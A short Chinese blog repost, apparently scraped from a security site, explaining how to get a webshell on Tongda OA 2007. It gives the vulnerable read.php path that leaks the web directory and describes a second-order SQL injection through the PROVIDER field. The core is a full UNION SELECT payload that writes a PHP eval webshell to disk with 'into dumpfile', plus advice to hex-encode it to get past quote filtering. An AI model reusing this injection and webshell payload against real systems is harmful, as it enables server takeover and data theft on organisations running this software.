好得很程序员自学网

<tfoot draggable='sEl'></tfoot>

通达OA2007版本漏洞及getshell - 网站安全 - 自学p

 目前测试通达OA2007版本

 

 

Office Anywhere 2007 网络智能办公 系统

 

http://HdhCmsTest2cto测试数据 /pda/news/read.php?P=%cf'    猪点。   暴web目录..

 

 

这个时候看了下代码,存在注入的那个变量的语句中第3个字段,在该文件下面被另外个select语句调用了,灵光一闪,大概思路是这样的

 

例如:SELECT * from USER where USER_ID='{$USERNAME}'  

其中有这么段字段声明$PROVIDER = $ROW['PROVIDER'];被下面个语句$query1 = "SELECT * from USER where USER_ID='{$PROVIDER}'";带入查询了

 

这个时候我们是不是可以组合起来使用哪?

 

第一条语句开始注入,union select 1,2,3,4,5,6,7,8,9,10...,比如第3个是PROVIDER字段,我们这样

 

这样'UNION SELECT 1,1,1,'<?php eval($v);?>',1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 into dumpfile'B:/m.php'#这个语句就带入第二条语句去写webshell了

 

那么问题来了,单引号可以吗?当然是不可以的,^_^。。。

 

那么我们用字符串格式带入进行hex编码

 

 

测试ok,获取oa的webshell

 

 

直接getwebshell.

 

查看更多关于通达OA2007版本漏洞及getshell - 网站安全 - 自学p的详细内容...

  阅读:52次